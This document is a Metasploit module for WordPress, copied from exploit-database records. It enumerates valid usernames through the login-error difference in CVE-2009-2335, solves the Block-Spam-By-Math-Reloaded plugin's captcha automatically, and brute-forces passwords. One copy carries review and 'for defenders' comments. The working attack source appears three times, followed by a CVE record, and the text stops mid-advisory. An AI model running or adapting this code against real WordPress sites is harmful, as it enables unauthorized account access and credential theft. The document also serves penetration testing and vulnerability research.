##
# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
# Registers the module's metadata and its user-settable options.
#
# The hash handed to +super+ carries the name, authors, license and advisory
# identifiers. The option list adds the login page path plus three switches
# that run_host and do_login read from the datastore.
#
# NOTE(review): Core Security advisory CORE-2009-0515 pairs CVE-2009-2335 with
# BID 35584 and lists BID 35581 next to CVE-2009-2334 - confirm which BID
# belongs in 'References'.
def initialize
  module_info = {
    'Name' => 'Wordpress Brute Force and User Enumeration Utility',
    'Version' => '$Revision: 12196 $',
    'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility',
    'Author' => [
      'Alligator Security Team',
      'Tiago Ferreira <tiago.ccna[at]gmail.com>',
      'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass
    ],
    'References' => [
      ['BID', '35581'],
      ['CVE', '2009-2335'],
      ['OSVDB', '55713']
    ],
    'License' => MSF_LICENSE
  }
  super(module_info)

  # Each option is declared as [required, description, default].
  module_options = [
    Opt::RPORT(80),
    # Path of the login script on the target; every request in this module is sent to it.
    OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),
    # When true, run_host probes usernames first and only tries passwords for confirmed ones.
    OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]),
    # When true, do_login fetches the login form first and echoes back the plugin's math fields.
    OptBool.new('BSBM_BYPASS', [ true, "Block-Spam-By-Math-Reloaded Bypass ", false]),
    # When true, run_host performs the password-guessing phase.
    OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ])
  ]
  register_options(module_options, self.class)
end
# Builds the URL string that prefixes every status line this module prints.
#
# The scheme is the literal "http://"; host, port and path come from vhost,
# rport and the URI option.
# NOTE(review): this string is for display only - the requests themselves are
# built by send_request_cgi, so if the client is configured for TLS the printed
# scheme may not match what is on the wire. Confirm against the HttpClient mixin.
def target_url
  format('http://%s:%s%s', vhost, rport, datastore['URI'])
end
# Scanner entry point for one host: an optional username-enumeration phase
# followed by an optional password-guessing phase.
#
# With VALIDATE_USERS set, @users_found is reset and filled by do_enum, and the
# brute-force phase is limited to the usernames recorded there (or skipped
# entirely when none were recorded). Without it, every pair yielded by
# each_user_pass is handed to do_login.
#
# ip - supplied by the scanner mixin; not read in this method.
#
# NOTE(review): the values returned from the blocks (:abort, :next_user,
# :skip_user, nil) are presumably interpreted by each_user_pass - verify
# against the AuthBrute mixin.
def run_host(ip)
  noun_for = lambda { |count| count == 1 ? "user" : "users" }

  if datastore['VALIDATE_USERS']
    @users_found = {}
    vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
    each_user_pass do |user, _pass|
      do_enum(user)
    end

    hits = @users_found.keys.size
    unless hits == 0
      print_good("#{target_url} - WordPress Enumeration - Found #{hits} valid #{noun_for.call(hits)}")
    end
  end

  return unless datastore['BRUTEFORCE']

  vprint_status("#{target_url} - WordPress Brute Force - Running Bruteforce")
  if datastore['VALIDATE_USERS']
    hits = @users_found ? @users_found.keys.size : 0
    if hits == 0
      vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
      return
    end
    vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{hits} valid #{noun_for.call(hits)}")
  end

  each_user_pass do |user, pass|
    # Only usernames confirmed during enumeration get password attempts.
    next if datastore['VALIDATE_USERS'] && !@users_found[user]
    do_login(user, pass)
  end
end
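# Checks whether +user+ is an existing account by posting it to the login page
# with the fixed dummy password "x" and inspecting the error page.
#
# A 200 response whose body contains "Incorrect password", or the script
# fragment that focuses the password field, is treated as "account exists".
# This is the behaviour difference described by CVE-2009-2335 (different
# failed-login output depending on whether the account exists).
#
# For defenders: each probe is a POST to the login URI with pwd=x, so a run of
# failed logins across many usernames from one source is the visible pattern.
# A login page that returns the same message for unknown users and wrong
# passwords gives this check nothing to distinguish.
#
# user - username to probe (converted with to_s before encoding).
#
# Returns :next_user when the name is valid (also recorded in @users_found and
# reported), :skip_user when it is not, :abort when there is no usable
# response, and nil when the connection fails.
def do_enum(user=nil)
  post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login"
  print_status("#{target_url} - WordPress Enumeration - Checking Username:'#{user}'")

  res = send_request_cgi({
    'method' => 'POST',
    'uri' => datastore['URI'],
    'data' => post_data,
  }, 20)

  # The original guarded with `res and ...` but then read res.code in the error
  # message, which raised NoMethodError whenever no response object came back.
  unless res && res.code == 200
    status = res ? "#{res.code} response" : "No response"
    print_error("#{target_url} - WordPress Enumeration - Enumeration is not possible. #{status}")
    return :abort
  end

  body = res.body.to_s
  valid_user = body =~ /Incorrect password/ || body =~ /document\.getElementById\(\'user_pass\'\)/

  unless valid_user
    vprint_error("#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'")
    return :skip_user
  end

  print_good("#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID")
  report_auth_info(
    :host => rhost,
    :sname => 'http',
    :user => user,
    :port => rport,
    :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
  )

  @users_found[user] = :reported
  :next_user
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
  # Connection problems stay non-fatal (nil result, as before), but they are no
  # longer swallowed without a trace.
  vprint_error("#{target_url} - WordPress Enumeration - Connection failed: #{e.class}")
  nil
end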
# Adds up the integer value of every entry in +values+.
#
# Each entry is converted with to_i, so digit strings count as their number and
# nil counts as 0. do_login sends the result as the mathvalue2 form field.
#
# values - list of digit strings (entries may be nil).
#
# Returns the Integer sum; 0 for an empty list.
def smartaleck(values)
  values.inject(0) { |total, entry| total + entry.to_i }
end
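# Extracts the two numeric form values named mathvalue0 and mathvalue1 from a
# login page response.
#
# For each index the body is searched for the field name followed, on the same
# line, by "value=", one arbitrary character and a run of digits; the digits
# are returned as a string.
#
# Compared with the original, this reads the capture from the MatchData object
# instead of the global $3, and tolerates a nil response or nil body (the
# request helper can hand back nil), returning nil entries instead of raising
# NoMethodError.
#
# response - object responding to #body, or nil.
#
# Returns a two-element Array; an entry is nil when its field was not found.
def getvalues(response)
  page = response ? response.body.to_s : ''
  (0..1).map do |index|
    found = page.match(%r{.?(mathvalue#{index}).*(value=).([\d]+)})
    found && found[3]
  end
end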
# Fetches the login page with a plain GET so its form fields can be read.
#
# The request goes to the path in the URI option with a 20 second timeout.
# Nothing is rescued here, so any exception raised by send_request_cgi
# propagates to the caller.
#
# Returns whatever send_request_cgi returns.
def baserequest()
  request = {
    'method' => 'GET',
    'uri' => datastore['URI']
  }
  send_request_cgi(request, 20)
end
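# Attempts one login with +user+ / +pass+ against the login page and classifies
# the response.
#
# A 302 whose Set-Cookie header contains "wordpress_logged_in_" is treated as a
# successful login and reported; a body containing "login_error" is a failed
# attempt; anything else aborts.
#
# Fixes over the original:
# * a missing response no longer raises NoMethodError on res.body;
# * a 302 without a Set-Cookie header no longer raises on nil.match;
# * with BSBM_BYPASS set, a missing response to the preliminary GET aborts
#   instead of raising inside getvalues, and connection errors from that GET
#   are handled like those of the POST;
# * the verbose "Trying username" line is printed in both branches.
#
# Handling note: the cleartext password is printed in verbose output and passed
# to report_auth_info together with the full Set-Cookie value, so console logs
# and the stored report data should be treated as credential material.
#
# For defenders: success is recognised purely from the redirect plus the
# logged-in cookie, so repeated failed POSTs to the login URI followed by such
# a redirect is the sequence worth alerting on.
#
# user - username to try (converted with to_s before encoding).
# pass - password to try (converted with to_s before encoding).
#
# Returns :next_user on success, nil on a failed login or connection error,
# :abort on a missing or unrecognized response.
def do_login(user=nil,pass=nil)
  login = Rex::Text.uri_encode(user.to_s)
  secret = Rex::Text.uri_encode(pass.to_s)

  if datastore['BSBM_BYPASS']
    form_page = baserequest()
    unless form_page
      print_error("#{target_url} - WordPress Brute Force - No response when fetching the login form")
      return :abort
    end
    v = getvalues(form_page)
    sec_answer = smartaleck(v)
    # NOTE(review): the doubled '&' before wp-submit is kept exactly as in the original request string.
    post_data = "log=#{login}&pwd=#{secret}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login"
  else
    post_data = "log=#{login}&pwd=#{secret}&wp-submit=Login"
  end
  vprint_status("#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")

  res = send_request_cgi({
    'method' => 'POST',
    'uri' => datastore['URI'],
    'data' => post_data,
  }, 20)

  unless res
    vprint_error("#{target_url} - WordPress Brute Force - No response")
    return :abort
  end

  if res.code == 302
    # to_s keeps a redirect without any Set-Cookie header on the "unrecognized" path.
    if res.headers['Set-Cookie'].to_s.match(/wordpress_logged_in_(.*);/i)
      print_good("#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
      report_auth_info(
        :host => rhost,
        :port => rport,
        :sname => 'http',
        :user => user,
        :pass => pass,
        :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}",
        :active => true
      )
      return :next_user
    end

    print_error("#{target_url} - WordPress Brute Force - Unrecognized 302 response")
    :abort
  elsif res.body.to_s =~ /login_error/
    vprint_error("#{target_url} - WordPress Brute Force - Failed to login as '#{user}'")
    nil
  else
    print_error("#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response")
    :abort
  end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
  # Connection problems stay non-fatal (nil result, as before), but they are no
  # longer swallowed without a trace.
  vprint_error("#{target_url} - WordPress Brute Force - Connection failed: #{e.class}")
  nil
end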
end
{"id": "EDB-ID:17702", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass", "description": "WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass. CVE-2009-2335. Webapps exploit for php platform", "published": "2011-08-20T00:00:00", "modified": "2011-08-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/17702/", "reporter": "Tiago Ferreira and Heyder Andrade", "references": [], "cvelist": ["CVE-2009-2335"], "lastseen": "2016-02-02T08:23:15", "viewCount": 5, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-02-02T08:23:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2335"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_LOGIN_ENUM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:104268", "PACKETSTORM:79033"]}, {"type": "seebug", "idList": ["SSV:11777", "SSV:14855", "SSV:11787"]}, {"type": "openvas", "idList": ["OPENVAS:64699", "OPENVAS:136141256231064407", "OPENVAS:64407", "OPENVAS:64697", "OPENVAS:136141256231064404", "OPENVAS:136141256231064699", "OPENVAS:64404", "OPENVAS:1361412562310800662", "OPENVAS:136141256231064697", "OPENVAS:1361412562310800657"]}, {"type": "nessus", "idList": ["FEDORA_2009-8538.NASL", "FEDORA_2009-7701.NASL", "FEDORA_2009-8529.NASL", "FEDORA_2009-7729.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22142", "SECURITYVULNS:VULN:10056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EA9973B6F5F19BFE8F3E86AA281A9086"]}], "modified": "2016-02-02T08:23:15", "rev": 2}, "vulnersScore": 6.4}, "sourceHref": "https://www.exploit-db.com/download/17702/", "sourceData": "##\r\n# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Auxiliary::AuthBrute\r\n\tinclude Msf::Auxiliary::Report\r\n\tinclude Msf::Auxiliary::Scanner\r\n\r\n\r\n\tdef initialize\r\n\t\tsuper(\r\n\t\t\t'Name' => 'Wordpress Brute Force and User Enumeration Utility',\r\n\t\t\t'Version' => '$Revision: 12196 $',\r\n\t\t\t'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility',\r\n\t\t\t'Author' => [\r\n\t\t\t\t'Alligator Security Team',\r\n\t\t\t\t'Tiago Ferreira <tiago.ccna[at]gmail.com>',\r\n 'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass\r\n\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['BID', '35581'],\r\n\t\t\t\t\t['CVE', '2009-2335'],\r\n\t\t\t\t\t['OSVDB', '55713'],\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE\r\n\t\t)\r\n\r\n\t\tregister_options(\r\n\t\t\t[ Opt::RPORT(80),\r\n\t\t\t\tOptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),\r\n\t\t\t\tOptBool.new('VALIDATE_USERS', [ true, \"Enumerate usernames\", true ]),\r\n\t\t\t\tOptBool.new('BSBM_BYPASS', [ true, \"Block-Spam-By-Math-Reloaded Bypass \", false]),\r\n\t\t\t\tOptBool.new('BRUTEFORCE', [ true, \"Perform brute force authentication\", true ]),\r\n\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef target_url\r\n\t\t\"http://#{vhost}:#{rport}#{datastore['URI']}\"\r\n\tend\r\n\r\n\r\n\tdef run_host(ip)\r\n\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t@users_found = {}\r\n\t\t\tvprint_status(\"#{target_url} - WordPress Enumeration - Running User Enumeration\")\r\n\t\t\teach_user_pass { |user, pass|\r\n\t\t\t\tdo_enum(user)\r\n\t\t\t}\r\n\r\n\t\t\tunless (@users_found.empty?)\r\n\t\t\t\tprint_good(\"#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? 
\"user\" : \"users\"}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tif datastore['BRUTEFORCE']\r\n\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - Running Bruteforce\")\r\n\t\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t\tif @users_found && @users_found.keys.size > 0\r\n\t\t\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\r\n\t\t\t\telse\r\n\t\t\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - No valid users found. Exiting.\")\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\teach_user_pass { |user, pass|\r\n\t\t\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t\t\tnext unless @users_found[user]\r\n\t\t\t\tend\r\n\t\t\t\t\tdo_login(user, pass)\r\n\t\t\t}\r\n\t\tend\r\n\tend\r\n\r\n\tdef do_enum(user=nil)\r\n\t\tpost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login\"\r\n\t\tprint_status(\"#{target_url} - WordPress Enumeration - Checking Username:'#{user}'\")\r\n\r\n\t\tbegin\r\n\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'uri' => datastore['URI'],\r\n\t\t\t\t'data' => post_data,\r\n\t\t\t}, 20)\r\n\r\n\r\n\t\t\tvalid_user = false\r\n\r\n\t\t\tif (res and res.code == 200 )\r\n\t\t\t\tif (res.body.to_s =~ /Incorrect password/ )\r\n\t\t\t\t\tvalid_user = true\r\n\r\n\t\t\t\telsif (res.body.to_s =~ /document\\.getElementById\\(\\'user_pass\\'\\)/ )\r\n\t\t\t\t\tvalid_user = true\r\n\r\n\t\t\t\telse\r\n\t\t\t\t\tvalid_user = false\r\n\r\n\t\t\t\tend\r\n\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Enumeration - Enumeration is not possible. 
#{res.code} response\")\r\n\t\t\t\treturn :abort\r\n\r\n\t\t\tend\r\n\r\n\t\t\tif valid_user\r\n\t\t\t\tprint_good(\"#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID\")\r\n\t\t\t\treport_auth_info(\r\n\t\t\t\t\t:host => rhost,\r\n\t\t\t\t\t:sname => 'http',\r\n\t\t\t\t\t:user => user,\r\n\t\t\t\t\t:port => rport,\r\n\t\t\t\t\t:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}\"\r\n\t\t\t\t)\r\n\r\n\t\t\t\t@users_found[user] = :reported\r\n\t\t\t\treturn :next_user\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'\")\r\n\t\t\t\treturn :skip_user\r\n\t\t\tend\r\n\r\n\t\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n\t\trescue ::Timeout::Error, ::Errno::EPIPE\r\n\t\tend\r\n\tend\r\n\r\n def smartaleck(values)\r\n answer = 0 \r\n values.each { |a| answer+=a.to_i }\r\n return answer\r\n end\r\n\r\n def getvalues(response)\r\n i = 0 \r\n values = []\r\n while (i <= 1) do\r\n response.body.match(%r{.?(mathvalue#{i}).*(value=).([\\d]+)})\r\n values[i] = $3\r\n i += 1\r\n end \r\n return values\r\n end\r\n\r\n def baserequest()\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['URI'],\r\n }, 20) \r\n return res\r\n end\r\n end\r\n\r\n\r\n\tdef do_login(user=nil,pass=nil)\r\n if (datastore['BSBM_BYPASS'])\r\n v = getvalues(baserequest())\r\n sec_answer = smartaleck(v)\r\n\t\t post_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login\"\r\n else\r\n\t\t post_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login\"\r\n\t\t vprint_status(\"#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\")\r\n end\r\n\r\n\t\tbegin\r\n\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'uri' => 
datastore['URI'],\r\n\t\t\t\t'data' => post_data,\r\n\t\t\t}, 20)\r\n\r\n\t\t\tif (res and res.code == 302 )\r\n\t\t\t\tif res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)\r\n\t\t\t\t\tprint_good(\"#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\")\r\n\t\t\t\t\treport_auth_info(\r\n\t\t\t\t\t\t:host => rhost,\r\n\t\t\t\t\t\t:port => rport,\r\n\t\t\t\t\t\t:sname => 'http',\r\n\t\t\t\t\t\t:user => user,\r\n\t\t\t\t\t\t:pass => pass,\r\n\t\t\t\t\t\t:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}\",\r\n\t\t\t\t\t\t:active => true\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\t\treturn :next_user\r\n\t\t\t\tend\r\n\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized 302 response\")\r\n\t\t\t\treturn :abort\r\n\r\n\t\t\telsif res.body.to_s =~ /login_error/\r\n\t\t\t\tvprint_error(\"#{target_url} - WordPress Brute Force - Failed to login as '#{user}'\")\r\n\t\t\t\treturn\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response\") if res\r\n\t\t\t\treturn :abort\r\n\t\t\tend\r\n\r\n\t\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n\t\trescue ::Timeout::Error, ::Errno::EPIPE\r\n\t\tend\r\n\tend\r\nend\r\n\r\n", "osvdbidlist": ["55713"]}
{"cve": [{"lastseen": "2020-12-09T19:31:20", "description": "WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: the vendor reportedly disputes the significance of this issue, indicating that the behavior exists for \"user convenience.\"", "edition": 5, "cvss3": {}, "published": "2009-07-10T21:00:00", "title": "CVE-2009-2335", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2335"], "modified": "2018-11-08T20:38:00", "cpe": [], "id": "CVE-2009-2335", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2335", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:24:49", "description": "", "published": "2011-08-21T00:00:00", "type": "packetstorm", "title": "WordPress Block-Spam-By-Math-Reloaded Plugin Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335"], "modified": "2011-08-21T00:00:00", "id": "PACKETSTORM:104268", "href": "https://packetstormsecurity.com/files/104268/WordPress-Block-Spam-By-Math-Reloaded-Plugin-Bypass.html", "sourceData": "`## \n# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Auxiliary::AuthBrute \ninclude Msf::Auxiliary::Report \ninclude Msf::Auxiliary::Scanner \n \n \ndef initialize \nsuper( \n'Name' => 'Wordpress Brute Force and User Enumeration Utility', \n'Version' => '$Revision: 12196 $', \n'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', \n'Author' => [ \n'Alligator Security Team', \n'Tiago Ferreira <tiago.ccna[at]gmail.com>', \n'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass \n], \n'References' => \n[ \n['BID', '35581'], \n['CVE', '2009-2335'], \n['OSVDB', '55713'], \n], \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ Opt::RPORT(80), \nOptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']), \nOptBool.new('VALIDATE_USERS', [ true, \"Enumerate usernames\", true ]), \nOptBool.new('BSBM_BYPASS', [ true, \"Block-Spam-By-Math-Reloaded Bypass \", false]), \nOptBool.new('BRUTEFORCE', [ true, \"Perform brute force authentication\", true ]), \n], self.class) \n \nend \n \ndef target_url \n\"http://#{vhost}:#{rport}#{datastore['URI']}\" \nend \n \n \ndef run_host(ip) \nif datastore['VALIDATE_USERS'] \n@users_found = {} \nvprint_status(\"#{target_url} - WordPress Enumeration - Running User Enumeration\") \neach_user_pass { |user, pass| \ndo_enum(user) \n} \n \nunless (@users_found.empty?) \nprint_good(\"#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? 
\"user\" : \"users\"}\") \nend \nend \n \nif datastore['BRUTEFORCE'] \nvprint_status(\"#{target_url} - WordPress Brute Force - Running Bruteforce\") \nif datastore['VALIDATE_USERS'] \nif @users_found && @users_found.keys.size > 0 \nvprint_status(\"#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\") \nelse \nvprint_status(\"#{target_url} - WordPress Brute Force - No valid users found. Exiting.\") \nreturn \nend \nend \neach_user_pass { |user, pass| \nif datastore['VALIDATE_USERS'] \nnext unless @users_found[user] \nend \ndo_login(user, pass) \n} \nend \nend \n \ndef do_enum(user=nil) \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login\" \nprint_status(\"#{target_url} - WordPress Enumeration - Checking Username:'#{user}'\") \n \nbegin \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => datastore['URI'], \n'data' => post_data, \n}, 20) \n \n \nvalid_user = false \n \nif (res and res.code == 200 ) \nif (res.body.to_s =~ /Incorrect password/ ) \nvalid_user = true \n \nelsif (res.body.to_s =~ /document\\.getElementById\\(\\'user_pass\\'\\)/ ) \nvalid_user = true \n \nelse \nvalid_user = false \n \nend \n \nelse \nprint_error(\"#{target_url} - WordPress Enumeration - Enumeration is not possible. 
#{res.code} response\") \nreturn :abort \n \nend \n \nif valid_user \nprint_good(\"#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID\") \nreport_auth_info( \n:host => rhost, \n:sname => 'http', \n:user => user, \n:port => rport, \n:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}\" \n) \n \n@users_found[user] = :reported \nreturn :next_user \nelse \nvprint_error(\"#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'\") \nreturn :skip_user \nend \n \nrescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout \nrescue ::Timeout::Error, ::Errno::EPIPE \nend \nend \n \ndef smartaleck(values) \nanswer = 0 \nvalues.each { |a| answer+=a.to_i } \nreturn answer \nend \n \ndef getvalues(response) \ni = 0 \nvalues = [] \nwhile (i <= 1) do \nresponse.body.match(%r{.?(mathvalue#{i}).*(value=).([\\d]+)}) \nvalues[i] = $3 \ni += 1 \nend \nreturn values \nend \n \ndef baserequest() \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['URI'], \n}, 20) \nreturn res \nend \nend \n \n \ndef do_login(user=nil,pass=nil) \nif (datastore['BSBM_BYPASS']) \nv = getvalues(baserequest()) \nsec_answer = smartaleck(v) \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login\" \nelse \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login\" \nvprint_status(\"#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\") \nend \n \nbegin \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => datastore['URI'], \n'data' => post_data, \n}, 20) \n \nif (res and res.code == 302 ) \nif res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i) \nprint_good(\"#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\") \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => 
'http', \n:user => user, \n:pass => pass, \n:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}\", \n:active => true \n) \n \nreturn :next_user \nend \n \nprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized 302 response\") \nreturn :abort \n \nelsif res.body.to_s =~ /login_error/ \nvprint_error(\"#{target_url} - WordPress Brute Force - Failed to login as '#{user}'\") \nreturn \nelse \nprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response\") if res \nreturn :abort \nend \n \nrescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout \nrescue ::Timeout::Error, ::Errno::EPIPE \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/104268/wordpress_login_enum.rb.txt"}, {"lastseen": "2016-12-05T22:24:57", "description": "", "published": "2009-07-08T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0515", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-08T00:00:00", "id": "PACKETSTORM:79033", "href": "https://packetstormsecurity.com/files/79033/Core-Security-Technologies-Advisory-2009.0515.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nWordPress Privileges Unchecked in admin.php and Multiple Information \nDisclosures \n \n \n \n1. 
